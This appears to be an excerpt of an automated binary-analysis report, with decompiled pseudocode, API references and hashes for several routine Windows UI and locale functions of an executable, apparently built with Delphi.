                                                                        0x0046493c
                                                                        0x0046493c
                                                                        0x00000000
                                                                        0x00464728

                                                                        APIs
                                                                        • GetFocus.USER32 ref: 004646E0
                                                                        • DrawFocusRect.USER32 ref: 00464728
                                                                          • Part of subcall function 004202E8: FillRect.USER32 ref: 00420310
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FocusRect$DrawFill
                                                                        • String ID:
                                                                        • API String ID: 3476037706-0
                                                                        • Opcode ID: bd1cc9d83fbb64b7a4748703e1cad8a8f26c1da09dfb4c53e68ded7458c0d174
                                                                        • Instruction ID: 2e9b2cd7af3be85b1ad5ab87c8741589f721a3b3221bc1c176d7526e71f5910d
                                                                        • Opcode Fuzzy Hash: bd1cc9d83fbb64b7a4748703e1cad8a8f26c1da09dfb4c53e68ded7458c0d174
                                                                        • Instruction Fuzzy Hash: 83916F34A00145CFCB10EF68C485EAEB7F5BF99314F2445BAE5849B326E738AC45CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004344BC, Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E004344BC(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x496ba8 != 0) {
					L3:
					_t49 =  *0x496b88; // 0x0
					_t50 =  *0x496b88; // 0x0
					_t117 = E0043439C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x496ba8 == 0) {
						_t168 =  *0x496bac;
						if( *0x496bac != 0) {
							_t106 =  *0x496b9c; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x496bac; // 0x0
							E0043E5DC(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x496b88; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x496ba8;
						_t6 =  &_v24;
						 *_t6 =  *0x496ba8 != 0;
						__eflags =  *_t6;
						 *0x496ba8 = 2;
					} else {
						 *0x496ba8 = 1;
						_v24 = 0;
					}
					_t54 =  *0x496b8c; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x496b8c; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x496b8c; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x496b8c; // 0x0
							E004360F0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x496b8c; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E004343EC(2);
						_t121 =  *_t155;
						_t60 =  *0x496b8c; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x496bac != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x496bac; // 0x0
								E0043E598(_t82, _t158);
								_t84 =  *0x496bac; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x496bac; // 0x0
									E0043E6C4(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x496bac; // 0x0
									E0043E5DC(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x496bac; // 0x0
								E0043E738(_t91, _t131, __eflags);
								_t93 =  *0x495c2c; // 0x496c08
								SetCursor(E0045469C( *_t93, _t158));
							}
						}
						_t62 =  *0x495c2c; // 0x496c08
						_t65 = SetCursor(E0045469C( *_t62, _t158));
						if( *0x496ba8 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00434428(_t121);
								_t67 =  *0x496b8c; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E004360F0(_t118,  &_v24, _t155);
									_t65 = E004037D8(_t118, __eflags);
									_t135 =  *0x496b8c; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x496b8c; // 0x0
									_t65 = E004037D8( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x496b8c; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x496b8c; // 0x0
								_t65 = E004037D8( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x496b8c == 0) {
								goto L32;
							} else {
								_t119 =  *0x496b8c; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00408514(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x496b8c; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x496b8c; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x496b8c; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E004343EC(1);
					if( *0x496b8c == 0) {
						goto L32;
					}
					_t102 =  *0x496b8c; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x496b8c; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x496b8c; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E004343EC(0);
					if( *0x496b8c == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x496b98; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x496ba4; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x496b9c; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x496ba4; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                                                        0x004344c2
                                                                        0x004344cb
                                                                        0x004344fa
                                                                        0x004344fa
                                                                        0x00434500
                                                                        0x00434516
                                                                        0x0043451f
                                                                        0x00434521
                                                                        0x00434528
                                                                        0x0043452a
                                                                        0x00434530
                                                                        0x0043453d
                                                                        0x00434542
                                                                        0x00434542
                                                                        0x00434528
                                                                        0x00434547
                                                                        0x00434553
                                                                        0x00434563
                                                                        0x0043456a
                                                                        0x0043456a
                                                                        0x0043456a
                                                                        0x0043456f
                                                                        0x00434555
                                                                        0x00434555
                                                                        0x0043455c
                                                                        0x0043455c
                                                                        0x00434576
                                                                        0x0043457e
                                                                        0x004345cb
                                                                        0x004345cb
                                                                        0x004345d2
                                                                        0x004345d8
                                                                        0x004345db
                                                                        0x004345e4
                                                                        0x004345ec
                                                                        0x004345f4
                                                                        0x004345f9
                                                                        0x00434602
                                                                        0x00434609
                                                                        0x00434609
                                                                        0x00434617
                                                                        0x00434619
                                                                        0x0043461b
                                                                        0x00434625
                                                                        0x0043462e
                                                                        0x00434632
                                                                        0x0043463c
                                                                        0x00434641
                                                                        0x00434646
                                                                        0x0043464b
                                                                        0x0043464f
                                                                        0x0043466a
                                                                        0x0043466f
                                                                        0x00434674
                                                                        0x00434651
                                                                        0x00434655
                                                                        0x0043465c
                                                                        0x0043465e
                                                                        0x00434663
                                                                        0x00434663
                                                                        0x0043467b
                                                                        0x0043467b
                                                                        0x00434680
                                                                        0x00434688
                                                                        0x00434695
                                                                        0x00434695
                                                                        0x00434632
                                                                        0x0043469d
                                                                        0x004346aa
                                                                        0x004346b6
                                                                        0x00434789
                                                                        0x00434789
                                                                        0x004346bc
                                                                        0x004346bc
                                                                        0x004346be
                                                                        0x004346df
                                                                        0x004346e1
                                                                        0x004346e6
                                                                        0x004346e9
                                                                        0x004346eb
                                                                        0x00434719
                                                                        0x00434728
                                                                        0x0043472d
                                                                        0x00434733
                                                                        0x004346ed
                                                                        0x004346f5
                                                                        0x00434701
                                                                        0x00434706
                                                                        0x0043470c
                                                                        0x0043470c
                                                                        0x004346c0
                                                                        0x004346c3
                                                                        0x004346c6
                                                                        0x004346d3
                                                                        0x004346d3
                                                                        0x0043473d
                                                                        0x00000000
                                                                        0x0043473f
                                                                        0x0043473f
                                                                        0x00434745
                                                                        0x00434748
                                                                        0x00434750
                                                                        0x00434757
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043475e
                                                                        0x00434760
                                                                        0x00434767
                                                                        0x00434767
                                                                        0x0043476a
                                                                        0x00434771
                                                                        0x00434774
                                                                        0x0043477f
                                                                        0x00434780
                                                                        0x00434781
                                                                        0x00434782
                                                                        0x00000000
                                                                        0x00434782
                                                                        0x0043473d
                                                                        0x004346b6
                                                                        0x00434582
                                                                        0x0043458e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00434594
                                                                        0x00434599
                                                                        0x0043459c
                                                                        0x004345a4
                                                                        0x004345a7
                                                                        0x004345ae
                                                                        0x004345b4
                                                                        0x004345b9
                                                                        0x004345c5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004345c5
                                                                        0x004344cd
                                                                        0x004344d4
                                                                        0x004344d9
                                                                        0x004344df
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004344e1
                                                                        0x004344e9
                                                                        0x004344ec
                                                                        0x004344ee
                                                                        0x004344f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 00434530
                                                                        • GetDesktopWindow.USER32 ref: 00434655
                                                                        • SetCursor.USER32(00000000), ref: 004346AA
                                                                          • Part of subcall function 0043E738: 73451770.COMCTL32(00000000,?,00434685), ref: 0043E754
                                                                          • Part of subcall function 0043E738: ShowCursor.USER32(000000FF,00000000,?,00434685), ref: 0043E76F
                                                                        • SetCursor.USER32(00000000), ref: 00434695
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Cursor$DesktopWindow$73451770Show
                                                                        • String ID:
                                                                        • API String ID: 3513720257-0
                                                                        • Opcode ID: 0908ce388f1a167bea320882a453395eb452e286a3d3486925d54d05bbf51521
                                                                        • Instruction ID: 60a87f57ea885684c14f26adc1ba0dcb8032ffab10c766f9e9c89d1009de8357
                                                                        • Opcode Fuzzy Hash: 0908ce388f1a167bea320882a453395eb452e286a3d3486925d54d05bbf51521
                                                                        • Instruction Fuzzy Hash: 2191AEB42002519FC700DF69D885A46B7E5ABA9318F16D47BE808CB3B2E739FC45CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00450AA0, Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E00450AA0(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x450c66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E00449D44(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E0041C2AC(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E0043CF30(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0043CC2C(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E0043CF30(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0043CC2C(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0043CF30(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E0043CC2C(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E0043CC2C(_t92), _t70);
								}
								E00449D44(_t113, E0043CC2C(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00451B60(_t92, 1);
							}
							E004509D8(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x450c6d);
							return E00404348( &_v20);
						}
					}
				}
				_t77 =  *0x496c08; // 0x215094c
				_t79 = E00454224(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x496c08; // 0x215094c
						if(_t113 ==  *((intOrPtr*)(E00454210(_t81, _t111) + 0x248))) {
							_t83 =  *0x496c08; // 0x215094c
							if(_t92 != E00454210(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x495938; // 0x41d7a4
								E00406548(_t87,  &_v20);
								E0040A1B8(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00403DA8();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                                                        0x00450aa0
                                                                        0x00450aa8
                                                                        0x00450aab
                                                                        0x00450aae
                                                                        0x00450ab0
                                                                        0x00450ab4
                                                                        0x00450ab5
                                                                        0x00450aba
                                                                        0x00450abd
                                                                        0x00450ac2
                                                                        0x00450b34
                                                                        0x00450b34
                                                                        0x00450b3c
                                                                        0x00450b40
                                                                        0x00450b40
                                                                        0x00450b49
                                                                        0x00450b55
                                                                        0x00450b55
                                                                        0x00450b57
                                                                        0x00450b5f
                                                                        0x00450b65
                                                                        0x00450b65
                                                                        0x00450b6c
                                                                        0x00450c1f
                                                                        0x00450c24
                                                                        0x00450c26
                                                                        0x00450c32
                                                                        0x00450c32
                                                                        0x00000000
                                                                        0x00450b85
                                                                        0x00450b8f
                                                                        0x00450b9e
                                                                        0x00450bf8
                                                                        0x00450bff
                                                                        0x00450c03
                                                                        0x00450c08
                                                                        0x00450c0a
                                                                        0x00450c16
                                                                        0x00450c16
                                                                        0x00450c0a
                                                                        0x00000000
                                                                        0x00450bff
                                                                        0x00000000
                                                                        0x00450ba0
                                                                        0x00450ba0
                                                                        0x00450ba9
                                                                        0x00450bb7
                                                                        0x00450bba
                                                                        0x00450bc4
                                                                        0x00450bc9
                                                                        0x00450bcb
                                                                        0x00450bd5
                                                                        0x00450be1
                                                                        0x00450be1
                                                                        0x00450bf1
                                                                        0x00450bf1
                                                                        0x00450c37
                                                                        0x00450c3e
                                                                        0x00450c44
                                                                        0x00450c44
                                                                        0x00450c4b
                                                                        0x00450c52
                                                                        0x00450c55
                                                                        0x00450c58
                                                                        0x00450c65
                                                                        0x00450c65
                                                                        0x00450b8f
                                                                        0x00450b6c
                                                                        0x00450ac4
                                                                        0x00450ace
                                                                        0x00450ad1
                                                                        0x00450ad4
                                                                        0x00450ad7
                                                                        0x00450ad9
                                                                        0x00450adb
                                                                        0x00450aeb
                                                                        0x00450aef
                                                                        0x00450afb
                                                                        0x00450b00
                                                                        0x00450b03
                                                                        0x00450b10
                                                                        0x00450b15
                                                                        0x00450b24
                                                                        0x00450b29
                                                                        0x00450b29
                                                                        0x00450afb
                                                                        0x00450b2e
                                                                        0x00450b2f
                                                                        0x00450b2f
                                                                        0x00450b2f
                                                                        0x00450ad9

                                                                        APIs
                                                                        • GetMenu.USER32(00000000), ref: 00450BC4
                                                                        • SetMenu.USER32(00000000,00000000), ref: 00450BE1
                                                                        • SetMenu.USER32(00000000,00000000), ref: 00450C16
                                                                        • SetMenu.USER32(00000000,00000000,00000000,00450C66), ref: 00450C32
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$LoadString
                                                                        • String ID:
                                                                        • API String ID: 3688185913-0
                                                                        • Opcode ID: 7f759e05d317f3d3ed5b3ef52ee0ca78adf4f75efa92f7d46a79bbff11cb3295
                                                                        • Instruction ID: 93c5ed83d1bbe9563ebe99875d81bd0e706f4a4ab4f057bf17101cf897a6ad90
                                                                        • Opcode Fuzzy Hash: 7f759e05d317f3d3ed5b3ef52ee0ca78adf4f75efa92f7d46a79bbff11cb3295
                                                                        • Instruction Fuzzy Hash: 3751DD34A002449BDB25AFBA89C579E77959F05309F0415BBBC44AB397CA3CEC89C75C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040AE3C, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040AE3C() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x4967f0 = 0x409;
				 *0x4967f4 = 9;
				 *0x4967f8 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x4967f0 = _t14;
				}
				if(_t14 != 0) {
					 *0x4967f4 = _t14 & 0x3ff;
					 *0x4967f8 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x47a0c0, 0x40af90, 8 << 2);
				if( *0x47a0ac != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x4967fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x4967fc = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040ADC4(__eflags, _t49);
					}
				} else {
					_t20 = E0040AE24();
					if(_t20 != 0) {
						 *0x4967fd = 0;
						 *0x4967fc = 0;
						return _t20;
					}
					E0040ADC4(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00403120(0x47a0c0, 0x20, 0x40af90);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x4967fc = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x4967fd = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x4967f0; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x4967fd = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                                                        0x0040ae48
                                                                        0x0040ae52
                                                                        0x0040ae5c
                                                                        0x0040ae66
                                                                        0x0040ae6d
                                                                        0x0040ae6f
                                                                        0x0040ae6f
                                                                        0x0040ae77
                                                                        0x0040ae83
                                                                        0x0040ae8f
                                                                        0x0040ae8f
                                                                        0x0040aea3
                                                                        0x0040aeac
                                                                        0x0040af5b
                                                                        0x0040af60
                                                                        0x0040af65
                                                                        0x0040af6c
                                                                        0x0040af71
                                                                        0x0040af73
                                                                        0x0040af76
                                                                        0x0040af7c
                                                                        0x0040af7e
                                                                        0x00000000
                                                                        0x0040af86
                                                                        0x0040aeb2
                                                                        0x0040aeb2
                                                                        0x0040aeb9
                                                                        0x0040aebb
                                                                        0x0040aec2
                                                                        0x00000000
                                                                        0x0040aec2
                                                                        0x0040aecf
                                                                        0x0040aedf
                                                                        0x0040aee1
                                                                        0x0040aee6
                                                                        0x0040aee9
                                                                        0x0040aeef
                                                                        0x0040aef1
                                                                        0x0040aef3
                                                                        0x00000000
                                                                        0x0040aef3
                                                                        0x0040aeff
                                                                        0x0040af04
                                                                        0x0040af0a
                                                                        0x0040af0a
                                                                        0x0040af0c
                                                                        0x0040af0d
                                                                        0x0040af0e
                                                                        0x0040af0e
                                                                        0x0040af2a
                                                                        0x0040af30
                                                                        0x0040af35
                                                                        0x0040af3a
                                                                        0x0040af40
                                                                        0x0040af40
                                                                        0x0040af44
                                                                        0x0040af47
                                                                        0x0040af4d
                                                                        0x0040af4f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040af51
                                                                        0x0040af54
                                                                        0x0040af54
                                                                        0x0040af55
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040af55
                                                                        0x0040af40
                                                                        0x0040af8d
                                                                        0x0040af8d
                                                                        0x00000000

                                                                        APIs
                                                                        • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AF30
                                                                        • GetThreadLocale.KERNEL32 ref: 0040AE66
                                                                          • Part of subcall function 0040ADC4: GetCPInfo.KERNEL32(00000000,?), ref: 0040ADDD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InfoLocaleStringThreadType
                                                                        • String ID:
                                                                        • API String ID: 1505017576-0
                                                                        • Opcode ID: 9943d390ba79cd53de8c6b22d9f9e13eafadf78107b92bd341a0d54ad34a03fa
                                                                        • Instruction ID: 6a4de5057cbed62019ff6cd1b2bb6358f707544f7e948a3695c44cd18fd2b04b
                                                                        • Opcode Fuzzy Hash: 9943d390ba79cd53de8c6b22d9f9e13eafadf78107b92bd341a0d54ad34a03fa
                                                                        • Instruction Fuzzy Hash: B731F6A16803839AD710DB65AC01FA63794EB6134CF1580FBE984AB3D2DB3D4865C76F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00423738, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E00423738(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E00420398(_v8);
					_push(_t84);
					_push(0x423817);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E00424A54( *((intOrPtr*)(_v8 + 0x58)));
					E004235B4( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E00424C34( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L00406AE4();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L00406C5C();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L00406C2C();
					}
					E004207B0(_v8, _t66);
					_t58 =  *0x47a788; // 0x21506f4
					E00414814(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x42381e);
					return E00420604(_v8);
				}
			}



















                                                                        0x00423739
                                                                        0x0042373b
                                                                        0x0042373e
                                                                        0x00423741
                                                                        0x00423748
                                                                        0x00423822
                                                                        0x0042374e
                                                                        0x00423751
                                                                        0x00423758
                                                                        0x00423759
                                                                        0x0042375e
                                                                        0x00423761
                                                                        0x0042376a
                                                                        0x0042377b
                                                                        0x00423786
                                                                        0x0042378b
                                                                        0x0042378d
                                                                        0x00423792
                                                                        0x0042379d
                                                                        0x004237a2
                                                                        0x004237b8
